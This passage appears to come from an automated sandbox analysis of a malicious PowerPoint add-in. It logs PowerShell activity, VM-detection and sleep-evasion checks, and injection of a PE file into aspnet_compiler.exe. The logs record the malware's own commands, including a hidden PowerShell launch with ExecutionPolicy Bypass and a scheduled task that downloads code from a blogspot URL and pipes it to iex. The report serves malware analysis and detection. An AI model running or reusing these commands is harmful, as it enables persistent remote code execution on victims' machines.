          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeFunction Chain: threadDelayed,memAlloc,systemQueried,systemQueried,memAlloc,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,memAlloc,processSet,memAlloc,memAlloc,memAlloc,memAlloc,memAlloc,processSet,processSet
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeFunction Chain: threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,memAlloc,processSet,memAlloc,memAlloc,memAlloc,memAlloc,memAlloc,processSet,processSet,keyOpened,keyValueQueried,memAlloc,memAlloc,memAlloc
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6492Thread sleep time: -4611686018427385s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6636Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3144Thread sleep time: -17524406870024063s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672Thread sleep time: -11068046444225724s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4800Thread sleep count: 2313 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4800Thread sleep count: 7039 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4712Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe TID: 2172Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe TID: 2172Thread sleep count: 62 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe TID: 2172Thread sleep time: -1860000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe TID: 2172Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2920Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5017Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2934Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6734Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2555
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6661
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2313
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7039
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxmlJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xamlJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeThread delayed: delay time: 30000
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeThread delayed: delay time: 30000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: powershell.exe, 00000009.00000003.490643709.000000000A5EB000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.392063687.000000000528C000.00000004.00000001.sdmpBinary or memory string: Hyper-V
          Source: ModuleAnalysisCache.9.drBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000009.00000003.490643709.000000000A5EB000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.392063687.000000000528C000.00000004.00000001.sdmpBinary or memory string: d:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: ModuleAnalysisCache.9.drBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: ModuleAnalysisCache.9.drBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Writes to foreign memory regionsShow sources
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe base: 400000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe base: 402000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe base: 446000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe base: 448000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe base: C21008Jump to behavior
          Bypasses PowerShell execution policyShow sources
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1
          Injects a PE file into a foreign processesShow sources
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou "Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;
          Source: aspnet_compiler.exe, 0000001F.00000002.594626986.00000000019E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: aspnet_compiler.exe, 0000001F.00000002.594626986.00000000019E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: aspnet_compiler.exe, 0000001F.00000002.594626986.00000000019E0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: aspnet_compiler.exe, 0000001F.00000002.594626986.00000000019E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
